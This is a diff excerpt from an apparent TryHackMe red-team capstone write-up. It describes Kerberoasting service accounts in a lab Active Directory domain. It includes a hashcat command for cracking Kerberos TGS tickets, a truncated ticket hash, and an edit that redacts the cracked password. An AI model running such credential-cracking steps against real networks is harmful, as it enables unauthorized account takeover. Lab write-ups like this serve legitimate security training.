zinzloun/THM_WriteUP/RTM_Capstone/README.md

 	mssql/svcOctober      svcOctober   CN=Internet Access,OU=Groups,DC=corp,DC=thereserve,DC=loc  2023-02-15 10:07:45.563346  2023-03-31 00:26:54.115866

-I got 5 candidates.
+I got five candidates.
 The next step it's to try to extract the password from Kerberos tickets, since they are encrypted with the password of the service account associated with the SPN specified in the ticket request.
-The tickets are saved in kerberoastables.txt file, I used haschcat with the previously generated passwords list used to brute-force the VPN server.
+The tickets are saved in kerberoastables.txt file, I used haschcat with the previously generated passwords list, the same used to brute-force the VPN server.

   	hashcat -a 0 -m 13100 kerberoastables.txt pwd_list

 After a while I found a valid password (reused) for svcScanning user:

 	$krb5tgs$23$*svcScanning$CORP.THERESERVE.LOC$corp.thereserve.loc/svcScanning*$9b49...
- 	...7749a88126a66ac2:Password1!
+ 	...7749a88126a66ac2:xxxxxxxxx

 ### Compromise servers
 From the wrk1 workstation I used the following powershell snippet to perform a host discovery using common windows ports: